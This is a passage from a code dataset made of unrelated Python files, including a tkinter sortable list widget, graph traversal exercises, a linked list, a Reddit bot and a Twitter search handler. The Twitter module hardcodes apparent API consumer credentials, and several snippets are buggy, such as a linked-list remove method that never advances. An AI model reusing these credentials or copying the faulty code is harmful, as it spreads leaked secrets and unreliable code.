[]\n self._position = {}\n\n self._new_y_coord_of_selected_item = None\n\n def create_item(self, value=None, **kwargs):\n \n if self._item_relief is not None:\n kwargs.setdefault(\"relief\", self._item_relief)\n \n if self._item_borderwidth is not None:\n kwargs.setdefault(\"borderwidth\", self._item_borderwidth)\n \n if self._item_style is not None:\n kwargs.setdefault(\"style\", self._item_style)\n \n if self._item_padding is not None:\n kwargs.setdefault(\"padding\", self._item_padding)\n\n item = Item(self.master, value, self._item_width, self._item_height, self._on_item_selected, self._on_item_dragged, self._on_item_dropped, **kwargs) \n return item\n\n def configure_items(self, **kwargs):\n for item in self._list_of_items:\n item.configure(**kwargs)\n\n def add_item(self, item, index=None):\n if index is None:\n index = len(self._list_of_items)\n else:\n if not -len(self._list_of_items) < index < len(self._list_of_items):\n raise ValueError(\"Item index out of range\")\n\n for i in range(index, len(self._list_of_items)):\n _item = self._list_of_items[i]\n _item.move(0, self._item_height + self._gap)\n \n self._position[_item] += 1\n \n x = self._offset_x\n y = self._offset_y + index * (self._item_height + self._gap)\n\n self._list_of_items.insert(index, item)\n self._position[item] = index\n\n item.init(self, x,y)\n\n if len(self._list_of_items) == 1:\n self._bottom += self._item_height\n else:\n self._bottom += self._item_height + self._gap\n \n self.configure(height=self._bottom + self._offset_y)\n\n return item\n\n def delete_item(self, index):\n \n if isinstance(index, Item):\n index = self._position[index]\n else:\n if not -len(self._list_of_items) < index < len(self._list_of_items):\n raise ValueError(\"Item index out of range\")\n\n item = self._list_of_items.pop(index)\n value = item.value\n\n del 
self._position[item]\n\n item.destroy()\n \n for i in range(index, len(self._list_of_items)):\n _item = self._list_of_items[i]\n _item.move(0, -(self._item_height+self._gap))\n self._position[_item] -= 1\n \n if len(self._list_of_items) == 0:\n self._bottom -= self._item_height\n else:\n self._bottom -= self._item_height + self._gap\n\n self.configure(height=self._bottom + self._offset_y)\n \n return value\n\n del_item = delete_item\n \n def pop(self):\n return self.delete_item(-1)\n \n def shift(self):\n return self.delete_item(0)\n \n def append(self, item):\n self.add_item(item)\n \n def unshift(self, item):\n self.add_item(item, 0)\n \n def get_item(self, index):\n return self._list_of_items[index]\n\n def get_value(self, index):\n return self._list_of_items[index].value\n\n def _on_item_selected(self, item): \n self._index_of_selected_item = self._position[item]\n self._index_of_empty_container = self._index_of_selected_item\n\n def _on_item_dragged(self, x, y):\n\n if self._left < x < self._right and self._top < y < self._bottom:\n\n quotient, remainder = divmod(y-self._offset_y, self._item_height + self._gap)\n\n if remainder < self._item_height:\n \n new_container = quotient\n\n if new_container != self._index_of_empty_container:\n if new_container > self._index_of_empty_container:\n for index in range(self._index_of_empty_container+1, new_container+1, 1):\n item = self._get_item_of_virtual_list(index) \n\n item.move(0,-(self._item_height+self._gap))\n else:\n for index in range(self._index_of_empty_container-1, new_container-1, -1):\n item = self._get_item_of_virtual_list(index)\n\n item.move(0,self._item_height+self._gap)\n\n self._index_of_empty_container = new_container\n \n def _get_item_of_virtual_list(self, index):\n if self._index_of_empty_container == index:\n raise Exception(\"No item in index: %s\"%index)\n else:\n if self._index_of_empty_container != self._index_of_selected_item:\n if index > self._index_of_empty_container:\n index -= 1\n\n if index >= self._index_of_selected_item:\n index += 1\n item = self._list_of_items[index]\n return item\n\n def _on_item_dropped(self):\n \n item = self._list_of_items.pop(self._index_of_selected_item)\n self._list_of_items.insert(self._index_of_empty_container, item)\n \n x = self._offset_x\n y = self._offset_y + self._index_of_empty_container *(self._item_height + self._gap)\n \n item.set_position(x,y)\n \n for i in range(min(self._index_of_selected_item, self._index_of_empty_container),max(self._index_of_selected_item, self._index_of_empty_container)+1):\n item = self._list_of_items[i]\n self._position[item] = i\n \n self._index_of_empty_container = None\n self._index_of_selected_item = None\n\nif __name__ == \"__main__\":\n try:\n from Tkinter import Tk, IntVar\n from ttk import Label, Frame, Entry, Button, Style\n import tkMessageBox as messagebox\n from Tkconstants import *\n except ImportError:\n from tkinter import Tk, IntVar, messagebox\n from tkinter.ttk import Label, Frame, Entry, Button, Style\n from tkinter.constants import *\n\n root = Tk()\n root.title(\"DDList example\")\n root.geometry(\"%dx%d%+d%+d\"%(640, 550, 0, 0))\n \n Style().configure(\"Item.DDList.TFrame\", relief=RAISED)\n\n sortable_list = DDList(root, 200, 100, offset_x=10, offset_y=10, gap =10, item_borderwidth=1, item_relief=\"groove\")\n sortable_list.pack(expand=True, fill=BOTH)\n \n for i in range(4):\n item = sortable_list.create_item(value=i)\n label = Label(item, text=\"this is a label %s\"%i)\n label.pack(anchor=W, padx= (4,0), pady= (4,0))\n\n 
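# Worked example of the divmod slot test in _on_item_dragged above, using this
# demo's geometry (item_height=100, gap=10, offset_y=10): a cursor at y=235
# gives divmod(235 - 10, 100 + 10) == (2, 5); the remainder 5 is inside the
# 100-pixel item band, so the drag is hovering over slot index 2.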
sortable_list.add_item(item)\n\n frame = Frame(root)\n frame.pack(fill=X, pady=(0, 10))\n \n indexVar = IntVar()\n label = Label(frame, text=\"Entry index of item to delete:\")\n label.pack(side=LEFT, padx=(10,6))\n entry_of_index = Entry(frame,textvariable= indexVar, width=3)\n \n def delete_item(event=None):\n # accepts an optional event so it works both as a button command and a key binding\n try:\n index = indexVar.get()\n except ValueError:\n messagebox.showerror(\"Error\", \"Not a valid integer\")\n return\n\n entry_of_index.delete(0, END)\n sortable_list.delete_item(index)\n entry_of_index.bind('<Return>', delete_item)\n\n entry_of_index.pack(side=LEFT)\n \n Button(frame, text=\"Delete\", command=delete_item).pack(side=LEFT, padx=(3,0))\n\n root.mainloop()\n","sub_path":"recipes/Python/580717_Sortable_megawidget_tkinter_like_sortable/recipe-580717.py","file_name":"recipe-580717.py","file_ext":"py","file_size_in_byte":11376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"9012103","text":"# -*- coding: utf-8 -*-\nimport allure\n\nfrom model.group import Group\n\n\ndef test_add_group(app, db, json_groups, check_ui):\n group = json_groups\n with allure.step('Get group list from DB'):\n old_groups = db.get_group_list()\n with allure.step('Create group %s' % group):\n app.group.create(group)\n with allure.step('Verify group was added'):\n new_groups = db.get_group_list()\n old_groups.append(group)\n assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)\n if check_ui:\n assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)\n","sub_path":"test/test_add_group.py","file_name":"test_add_group.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"541851003","text":"import cv2\n\n\nclass InputFeeder:\n def __init__(self, input_type, input_file=None):\n '''\n input_type: str, The type of input. Can be 'video' for video file, 'image' for image file,\n or 'cam' to use webcam feed.\n input_file: str, The file that contains the input image or video file. 
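# The test_add_group record above sorts with Group.id_or_max; a sketch of that
# key function, given as an assumption (the real helper lives in model/group.py,
# outside this record):
#     def id_or_max(self):
#         return int(self.id) if self.id else sys.maxsize
# Groups that have no database id yet then sort after all persisted rows.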
Leave empty for cam input_type.\n '''\n self.input_type = input_type\n if input_type == 'video' or input_type == 'image':\n self.input_file = input_file\n\n def load_data(self):\n if self.input_type == 'video':\n self.cap=cv2.VideoCapture(self.input_file)\n elif self.input_type == 'cam':\n self.cap = cv2.VideoCapture(0)\n else:\n self.cap = cv2.imread(self.input_file)\n if not self.cap.isOpened():\n exit(0)\n\n def next_batch(self):\n '''\n Returns the next image from either a video file or webcam.\n If input_type is 'image', then it returns the same image.\n '''\n while True:\n flag, frame = self.cap.read()\n if not flag:\n break\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n yield flag, frame\n\n def calculate_fps(self):\n '''\n finds frames per second\n '''\n return int(self.cap.get(cv2.CAP_PROP_FPS))\n\n def release(self):\n '''\n Closes the VideoCapture.\n '''\n if not self.input_type=='image':\n self.cap.release()\n pass","sub_path":"src/Input_feeder.py","file_name":"Input_feeder.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391909589","text":"i_min = 0\r\ni = 5\r\ni_max = 10\r\nwhile i>i_min and i 0:\n v = queue.pop()\n if v == v_tesoro:\n return v\n for suc in lab.succs(v):\n if suc not in seen:\n seen.add(suc)\n queue.push(suc)\n\n\ndef recorredor_vertices_anchura(lab, v_inicial):\n vertices = []\n queue = Fifo()\n seen = set()\n queue.push(v_inicial)\n seen.add(v_inicial)\n while len(queue) > 0:\n v = queue.pop()\n vertices.append(v)\n for suc in lab.succs(v):\n if suc not in seen:\n seen.add(suc)\n queue.push(suc)\n return vertices\n\n\ndef recorredor_aristas_anchura(lab, v_inicial):\n aristas = []\n queue = Fifo()\n seen = set()\n queue.push((v_inicial, v_inicial))\n seen.add(v_inicial)\n while len(queue) > 0:\n u, v = queue.pop()\n aristas.append((u, v))\n for suc in lab.succs(v):\n if suc not in seen:\n seen.add(suc)\n queue.push((v, suc))\n return aristas\n\n\ndef busca_tesoro_profundidad(lab, v_inicial):\n def explorar_desde(v):\n seen.add(v)\n if v == v_tesoro: #Recorrido en Pre-orden\n return v #\n for suc in lab.succs(v):\n res = explorar_desde(suc)\n if res is not None:\n return res\n #if v == v_tesoro: #Recorrido en Post-Orden\n # return v #\n seen = set()\n return explorar_desde(v_inicial)\n\n\ndef recorredor_vertices_profundidad(lab, v_inicial):\n def explorar_desde(v):\n seen.add(v)\n vertices.append(v) #Preorden\n for suc in lab.succs(v):\n if suc not in seen:\n explorar_desde(suc)\n #vertices.append(v) #Recorrido en Post-Orden\n vertices = []\n seen = set()\n explorar_desde(v_inicial)\n return vertices\n\n\ndef recorredor_aristas_profundidad(lab, v_inicial):\n def explorar_desde(u, v):\n seen.add(v)\n aristas.append((u, v)) #Preorden\n for suc in lab.succs(v):\n if suc not in seen:\n explorar_desde(v, suc)\n #vertices.append(u, v) #Recorrido en Post-Orden\n aristas = []\n seen = set()\n explorar_desde(v_inicial, v_inicial)\n return aristas\n\n\ndef recuperador_camino(lista_aristas, v):\n \"\"\"bp = {}\n for orig, dest in lista_aristas:\n bp[dest] = orig\n \"\"\"\n bp = dict((dest, orig) for orig, dest in lista_aristas)\n\n camino = [v]\n while v is not bp[v]:\n v = bp[v]\n camino.append(v)\n\n camino.reverse()\n return camino\n\n\npasillos = [((0,0),(0,1)), ((0,2),(0,3)), ((1,0),(1,1)), ((1,1),(1,2)), ((2,0),(2,1)), ((2,1),(2,2)), ((2,2),(2,3)), ((0,1),(1,1)),((0,2),(1,2)), ((0,3),(1,3)), ((1,1),(2,1)), ((1,2),(2,2))]\n\nlaberinto = 
UndirectedGraph(E=pasillos)\n\nv_inicio = (0, 0)\nv_tesoro = (1, 3)\n\n#pos_tesoro_encontrada = busca_tesoro_anchura(laberinto, v_inicio)\nlista_aristas = recorredor_aristas_anchura(laberinto, v_inicio)\ncamino_corto = recuperador_camino(lista_aristas, v_tesoro)\n\n\"\"\"if pos_tesoro_encontrada is None:\n print(\"Tesoro no encontrado\")\nelse:\n print(\"Tesoro encontrado en la habitación {0}\".format(pos_tesoro_encontrada))\n\"\"\"\nprint(camino_corto)\n\n\n","sub_path":"Teoria/clase23sep.py","file_name":"clase23sep.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309297064","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n# -*- coding: utf-8 -*-\n\"\"\"Test desiutil.plots.\n\"\"\"\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\n# The line above will help with 2to3 support.\nimport unittest\nimport os\nimport numpy as np\n\n# Set non-interactive backend for Travis\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nfrom ..plots import plot_slices\nfrom ..plots import plot_sky\n\ntry:\n basestring\nexcept NameError: # For Python 3\n basestring = str\n\n\nclass TestPlots(unittest.TestCase):\n \"\"\"Test desiutil.plots\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.plot_file = 'test.png'\n cls.plot_file2 = 'test_sky.png'\n @classmethod\n def tearDownClass(cls):\n if os.path.exists(cls.plot_file):\n os.remove(cls.plot_file)\n\n def test_slices(self):\n \"\"\"Test plot_slices\n \"\"\"\n # Random data\n x = np.random.rand(10000)\n y = np.random.randn(10000)\n # Run\n ax = plot_slices(x,y,0.,1.,0.)\n ax.set_ylabel('N sigma')\n ax.set_xlabel('x')\n plt.savefig(self.plot_file)\n def test_plotsky(self):\n \"\"\"Test plot_sky\n \"\"\"\n import astropy.units as u\n x = 360*np.random.rand(100)*u.degree\n y = 360*np.random.rand(100)*u.degree\n plot_sky(x,y,discrete_colors=False)\n plt.savefig(self.plot_file2)\n\ndef test_suite():\n \"\"\"Allows testing of only this module with the command::\n\n python setup.py test -m \n \"\"\"\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n","sub_path":"py/desiutil/test/test_plots.py","file_name":"test_plots.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"512278578","text":"#!/usr/bin/env python\n#coding:utf-8\n# Author: mozman\n# Purpose: bruteforce algorithms\n# Created: 02.04.2010\n# License: MIT License\n\nfrom random import random\nfrom geoalg import Line2D\n\ndef closest_pair(points):\n _closest_pair = (points[0], points[1])\n points_count = len(points)\n min_so_far = _dist(points[0], points[1])\n for index1 in range(points_count-1):\n point1 = points[index1]\n for index2 in range(index1+1, points_count):\n point2 = points[index2]\n distance = _dist(point1, point2)\n if distance < min_so_far:\n min_so_far = distance\n _closest_pair = (point1, point2)\n return _closest_pair\n\ndef _dist(p1, p2):\n return ((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)**0.5\n\ndef intersection_points(lines):\n \"\"\"Brute force algorithm to find all intersections points of .\n lines -- list of points tuples [(s1, e1), (s2, e2), ...]\n where s1, e1, s2, ... 
are xy-tuples like (10.4, 5,7)\n\n z-axis will be ignored.\n \"\"\"\n intersection_points = []\n lines = list(lines)\n line_count = len(lines)\n for index1 in range(line_count):\n start, end = lines[index1]\n line1 = Line2D(start, end)\n for index2 in range(index1+1, line_count):\n start, end = lines[index2]\n point = line1.intersect(Line2D(start, end))\n if point:\n intersection_points.append(point)\n return intersection_points\n\n\ndef random_points(count, xdim=1000., ydim=1000.):\n xhalf = xdim / 2.\n yhalf = ydim / 2.\n return ((random() * xdim - xhalf , random() * ydim - yhalf) for _ in range(count))\n\n\ndef round_points(points, prec=6):\n return ((round(point[0], prec), round(point[1], prec)) for point in points)\n\n\ndef equal_lists(list1, list2, prec=6):\n set1 = set(round_points(list1, prec))\n set2 = set(round_points(list2, prec))\n if len(list1) != len(list2):\n return False\n return set1 == set2","sub_path":"geoalg/bruteforce.py","file_name":"bruteforce.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"482707039","text":"class Node(object):\n\n def __init__(self, item, next = None):\n self.data = item\n self.next = next\n\n def getData(self):\n return self.data\n\n def getNext(self):\n return self.next\n \n def setData(self, item):\n self.data = item\n \n def setNext(self, node):\n self.next = node\n\n\nclass Link_list(object):\n\n def __init__(self):\n self.head = None\n\n def isEmpty(self):\n return self.head == None\n\n def add(self, data):\n node = Node(data, self.head)\n self.head = node\n \n def append(self, data):\n node = Node(data)\n cur = self.head\n if cur is None:\n self.head = node\n else:\n while cur.next is not None:\n cur = cur.next\n cur.next = node\n\n def travel(self):\n cur = self.head\n while cur is not None:\n print(cur.data,end=\" \")\n cur = cur.getNext()\n print()\n \n def size(self):\n cur = self.head\n count = 0\n while cur is not None:\n count += 1\n cur = cur.getNext()\n return count\n \n def search(self, item):\n cur = self.head\n while cur is not None:\n if cur.getData() == item:\n return True\n cur = cur.getNext()\n return False\n\n def remove(self, item):\n cur = self.head\n if cur.getData() == item:\n self.head = cur.getNext()\n else:\n while cur.getNext() is not None:\n if cur.getNext().getData() == item:\n cur.setNext(cur.getNext().getNext())\n break\n \n def pop(self, pos):\n cur = self.head\n if pos == 0:\n temp = self.head.getData()\n self.head = self.head.getNext()\n return temp\n else:\n cur = self.head\n count = 1\n while cur.getNext() is not None and count != pos:\n cur = cur.getNext()\n count += 1\n temp = cur.next.getData()\n cur.setNext(cur.getNext().getNext())\n return temp\n\n def insert(self, pos, item):\n if pos == 0:\n self.add(item)\n else:\n node = Node(item)\n count = 0\n cur = self.head\n while count + 1 < pos and cur.getNext() is not None:\n cur = cur.getNext()\n count += 1\n node.setNext(cur.next)\n cur.setNext(node)\n\n\na = Link_list()\nfor i in range(10):\n a.append(i)\na.travel()\nprint(a.size())\na.remove(1)\na.add(10)\nprint(a.size())\na.remove(0)\na.travel()\nprint(a.pop(0),\"this is a pop method\")\na.travel()\na.insert(0, 8)\na.travel()\na.insert(3, 12)\na.travel()\na.insert(a.size()-1, 666)\na.insert(a.size()+20, 
786)\na.travel()\na.remove(8)\na.insert(2,8)\na.insert(5,8)\na.travel()\nprint(a.search(8))\nprint(a.search(1))","sub_path":"PKU-Python-DAC/顺序结构/link_list.py","file_name":"link_list.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"535717436","text":"import re\n\n'''\nPython tries to match the longest possible\nstring that matches the pattern provided\n'''\n# regular expressions in Python do greedy matches\n# here it matches the first five characters\ndigit_regex = re.compile(r'(\\d){3,5}')\nmatch_object = digit_regex.search('1234567890')\nprint(match_object.group())\n\n'''\nTo do a non-greedy match, include\na question mark after the curly braces\n'''\n# matches the smallest possible string\ndigit_regex = re.compile(r'(\\d){3,5}?')\nmatch_object = digit_regex.search('1234567890')\nprint(match_object.group())\n","sub_path":"regular-expressions/repetitions_regex_5.py","file_name":"repetitions_regex_5.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"353893638","text":"import re\r\nimport sys\r\nimport praw\r\nfrom HelperObjects import Predicate,Display,log\r\n\r\n# Properties\r\nTITLE_LIMIT=100\r\n\r\ndef get_subreddits(predicatelist):\r\n subreddits = []\r\n for user in predicatelist:\r\n for predicate in user.predicates:\r\n if predicate.subreddit not in subreddits:\r\n subreddits.append(predicate.subreddit)\r\n log('Requesting again subreddits: {subs}'.format(subs=subreddits))\r\n return subreddits\r\n\r\n# fetch updates from Reddit\r\ndef fetchposts(subs, predicatelist):\r\n reddit = praw.Reddit('subreddit_deals_bot')\r\n for submission in reddit.subreddit('+'.join(subs)).stream.submissions():\r\n log('Received submission: {sub}:{title}'.format(sub=submission.subreddit.display_name,title=submission.title))\r\n for username in Predicate.get_matched_usernames(submission,predicatelist):\r\n # Package list into readable,formatted text\r\n display = Display(submission)\r\n log('Added display text=[{display}]'.format(display=display.tostring()))\r\n # Notify Users\r\n reddit.redditor(username).message(display.title[:TITLE_LIMIT], display.tostring())\r\n\r\n\r\n# Running as script\r\ndef main():\r\n jsonfile = r'data_test.json'\r\n predicatelist = Predicate.init_from_json(jsonfile)\r\n fetchposts(get_subreddits(predicatelist), predicatelist)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"FetchUpdates.py","file_name":"FetchUpdates.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346712709","text":"# -*- coding: utf-8 -*-\r\n# File: general_hub_1.py\r\n# Author: Hualong Zhang \r\n# CreateDate: 19-03-09\r\nimport os\r\nimport sys\r\n# 模块路径引用统一回退到Libbot目录下\r\nproject_path = os.path.abspath(os.path.join(os.getcwd(), \"../..\"))\r\nsys.path.append(project_path)\r\n\r\nimport model.config.multiwheel_manage as multiwheelUnit\r\nfrom model.question.entity_match import entityMatch\r\nfrom model.question.entity_match2 import entityMatch2\r\nfrom model.grapg_QA.json_bot import jsonBot\r\nfrom model.grapg_QA.rdf_bot import rdfBot\r\nfrom model.grapg_QA.rdf_bot_multiwheel import rdfBotMul\r\nfrom model import aiml_cn\r\nfrom model.kb_prepare.rdf_prepare import rdfPrepare\r\nimport numpy as np\r\nimport time\r\n\r\n\r\n\r\nclass GeneralHub():\r\n \"\"\"\r\n 总控程序版本1\r\n \"\"\"\r\n def 
__init__(self):\r\n multiwheelUnit._init()\r\n multiwheelUnit.set_value('userid', 1)\r\n self._aiml_kernal = aiml_cn.Kernel()\r\n self._aiml_kernal.learn('../../resource/template.aiml')\r\n self._aiml_kernal.learn('../../resource/contain_template.aiml')\r\n self._aiml_kernal.learn('../../resource/multiwheelQA.aiml')\r\n self._aiml_kernal.learn('../../resource/time_template.aiml')\r\n def question_answer_hub(self, question_str):\r\n \"\"\"\r\n 问答总控,基于aiml构建问题匹配器\r\n :param question_str:问句输入\r\n :return:\r\n \"\"\"\r\n g = rdfPrepare.load_graph()\r\n question_replaced, entity_dict = entityMatch2.match_and_replace_all(question_str,g)\r\n #print(question_replaced,entity_dict)\r\n\r\n navi_g = rdfPrepare.load_navi_graph()\r\n navi_question_replaced, navi_entity_dict = entityMatch2.match_and_replace_all(question_str, navi_g)\r\n #print(navi_question_replaced, navi_entity_dict)\r\n # question_replaced, entity_dict = entityMatch.match_and_replace_all(question_str)\r\n '''\r\n arr = []\r\n if len(entity_dict['room']) > 0:\r\n for i in entity_dict['room']:\r\n if len(i) == 0:\r\n continue\r\n index = question_str.find(i[0])\r\n arr.append(index)\r\n # print(arr)\r\n arr_index = np.argsort(np.array(arr))\r\n # print(arr_index)\r\n entity_dict2 = []\r\n for i in entity_dict['room']:\r\n if len(i) == 0:\r\n continue\r\n entity_dict2.append(i)\r\n\r\n for i in range(len(entity_dict['room'])):\r\n if len(entity_dict['room'][i]) == 0:\r\n continue\r\n # print(arr_index[i],entity_dict2[arr_index[i]])\r\n entity_dict['room'][i] = entity_dict2[arr_index[i]]\r\n '''\r\n if multiwheelUnit.get_value('business') == \"办理读书卡\":\r\n if \"answer\" not in multiwheelUnit.get_value('step'):\r\n question_replaced += \"读卡\"\r\n else:\r\n multiwheelUnit.set_value('business',None)\r\n multiwheelUnit.set_value('step', None)\r\n\r\n aiml_respons = self._aiml_kernal.respond(question_replaced)\r\n\r\n if 'multiwheeltask_'in aiml_respons:\r\n print(\"aiml_respons: \", str(aiml_respons))\r\n # print(\"entity_dict: \", str(entity_dict))\r\n graph_respons = rdfBotMul.task_response(aiml_respons, entity_dict, question_str, g)\r\n return graph_respons\r\n elif 'task_' in aiml_respons:\r\n print(\"aiml_respons: \", str(aiml_respons))\r\n #print(\"entity_dict: \", str(entity_dict))\r\n if aiml_respons == 'task_room_pos':\r\n graph_respons = rdfBot.task_response(aiml_respons, navi_entity_dict, question_str, navi_g)\r\n else:\r\n graph_respons = rdfBot.task_response(aiml_respons,entity_dict,question_str,g)\r\n\r\n return graph_respons\r\n else:\r\n return aiml_respons\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n gh = GeneralHub()\r\n # gh.question_answer_hub('少年儿童馆主题活动区电话啥啊?')\r\n # gh.question_answer_hub('少年儿童馆在哪啊?')\r\n # gh.question_answer_hub('少年儿童馆主题活动区电话啥啊?')\r\n # gh.question_answer_hub('会议论文在哪?')\r\n # gh.question_answer_hub('学位论文在哪?')\r\n # gh.question_answer_hub('香港书在哪个馆啊?')\r\n #gh.question_answer_hub('古籍馆什么时候开?')\r\n test_hub = GeneralHub()\r\n while True:\r\n question_str = input('User:')\r\n if question_str == 'exit':\r\n break\r\n else:\r\n print('Libot:', test_hub.question_answer_hub(question_str))\r\n\r\n\r\n\r\n\r\n","sub_path":"backend/model/robot_hub/general_hub_1.py","file_name":"general_hub_1.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"172694988","text":"__author__ = 'zdj'\nclass Evaluator:\n def __init__(self, result_path, test_path):\n self.result_path = result_path\n self.test_path = test_path\n 
self.result_token_list = []\n self.test_token_list = []\n self.match_num = 0\n\n def get_token_list(self, path, token_list):\n file = open(path)\n r_list = file.readlines()\n file.close()\n for r in r_list:\n tokens = r.split()\n token_list.extend(tokens)\n\n # Align the two segmentations by character offset and count the tokens whose\n # start and end offsets agree, e.g. result ['ab', 'c', 'd'] vs. test\n # ['a', 'bc', 'd'] matches only on 'd', giving match_num == 1.\n def get_match_number(self):\n test_l = 0\n result_l = 0\n i = 0\n j = 0\n while True:\n if i >= len(self.test_token_list) or j >= len(self.result_token_list):\n break\n if test_l == result_l:\n if self.result_token_list[j] == self.test_token_list[i]:\n self.match_num += 1\n test_l += len(self.test_token_list[i])\n result_l += len(self.result_token_list[j])\n i += 1\n j += 1\n\n elif test_l > result_l:\n result_l += len(self.result_token_list[j])\n j += 1\n elif result_l > test_l:\n test_l += len(self.test_token_list[i])\n i += 1\n return self.match_num\n\n def get_recall_rate(self):\n rate = float(self.match_num) / len(self.test_token_list)\n return rate\n\n def get_precision_rate(self):\n rate = float(self.match_num) / len(self.result_token_list)\n return rate\n\nif __name__ == \"__main__\":\n e_tor = Evaluator('result.txt', 'test.txt') # placeholder file paths","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"525638250","text":"from twython import Twython\nfrom django.shortcuts import redirect\nfrom django.http import HttpResponseRedirect, HttpResponse\nimport TwitReaper.views\nfrom models import User,Twit\nimport circles\n\nimport requests\nCUSTOMER_KEY = 'QhlraziZ4px2EYecH8VfHRi3J'\nCUSTOMER_SECRET = 'MpHKZs179UN8rRuHBB591aU0X6A8WtVW6KFPK20gBk4RE9Nszb'\n\n\ndef twSearch(target, oauth_verifier, token, secret):\n # twitter = Twython( APP_KEY, APP_SECRET)\n # auth = twitter.get_authentication_tokens(callback_url='http://81.174.167.24/tr/verify')\n # OAUTH_TOKEN = auth['oauth_token']\n # OAUTH_SECRET = auth['oauth_token_secret']\n # HttpResponseRedirect(auth['auth_url'])\n\n # oauth_verifier = r['oauth_verifier']\n\n # oauth_verifier = r.text\n global CUSTOMER_KEY\n global CUSTOMER_SECRET\n\n twitter = Twython(CUSTOMER_KEY, CUSTOMER_SECRET,\n token, secret)\n\n final_step = twitter.get_authorized_tokens(oauth_verifier)\n\n OAUTH_TOKEN = final_step['oauth_token']\n OAUTH_SECRET = final_step['oauth_token_secret']\n name = final_step['screen_name']\n twid = final_step['user_id']\n\n allusers = list(User.objects.values())\n\n user = User.objects.create(name=str(name), twid=twid, token=OAUTH_TOKEN, secret=OAUTH_SECRET)\n\n # user.save()\n\n twitter = Twython(CUSTOMER_KEY, CUSTOMER_SECRET,\n OAUTH_TOKEN, OAUTH_SECRET)\n\n # ACCESS_TOKEN = twitter.obtain_access_token()\n # twitter = Twython( APP_KEY, access_token=ACCESS_TOKEN)\n result = {'user': user, 'results': twitter.search_users(q=target) }\n return result\n\ndef user_login(name=None):\n # user = None\n # if name is None:\n # user = User(name=name, token=None, secret=None)\n # else:\n\n user = User.objects.get(name=name)\n\n if user.token is None:\n return False\n else:\n return True\n\ndef buildCircle(targetid, name):\n # try:\n user = User.objects.get(name=name)\n twitter = getTwitter(user)\n success = False\n\n try:\n twit = Twit.objects.get(twid=targetid)\n # if not twit.done:\n success = circles.builder(twit, user )\n twit = Twit.objects.get(twid=targetid)\n return twit.report_id\n # else:\n #\n except:\n target = twitter.show_user(user_id=targetid)\n twit = Twit.objects.create(twid=str(targetid), name=target['screen_name'])\n success = 
circles.builder(twit, user)\n twit = Twit.objects.get(twid=targetid)\n return twit.report_id\n # except:\n # success = False\n\n # return success\n\n\ndef getTwitter(user):\n twitter = Twython(CUSTOMER_KEY, CUSTOMER_SECRET, user.token, user.secret)\n return twitter\n\n\ndef twSearch2(target, user):\n twitter = Twython(CUSTOMER_KEY, CUSTOMER_SECRET,\n user.token, user.secret)\n\n # ACCESS_TOKEN = twitter.obtain_access_token()\n # twitter = Twython( APP_KEY, access_token=ACCESS_TOKEN)\n result = {'user': user, 'results': twitter.search_users(q=target) }\n return result","sub_path":"TwitReaper/twithandler.py","file_name":"twithandler.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"276426772","text":"import pandas as pd\nimport warnings\nimport glob\nimport numpy as np\nfrom tqdm import tqdm\nfrom record import *\n\n\ndef load_all_arrythmia(filepath):\n arrythmia_list = pd.read_csv('../../arrythmia/hf_round1_arrythmia.txt',header=None,sep=\"\\t\",encoding='utf-8')\n arrythmia_id2t = {}\n arrythmia_t2id = {}\n for i in range(len(arrythmia_list)):\n arrythmia_id2t[i]=arrythmia_list[i]\n arrythmia_t2id[arrythmia_list[i]] = i\n return arrythmia_id2t, arrythmia_t2id\n\n\ndef load_all_df(filepath, data_dir):\n df = pd.read_csv(filepath, sep=\"\\t\", names=list(range(0, 12)))\n df.columns = ['data_file', 'age', 'gender', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10', 'f11']\n record_list = []\n for item_idx in df.index:\n item = df.loc[item_idx]\n label_list = df.loc[item_idx][3:-1]\n record = Record(data_dir=data_dir, datafile=item['data_file'], age=item['age'], gender=item['gender'], label_list=label_list)\n record_list.append(record)\n return record_list\n # df.columns = ['id','age','gender','f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10','f11']\n\n\nif __name__ == '__main__':\n record_list = load_all_df('/home/jiangli/data_tc/hefei_data/label/hf_round1_label.txt', 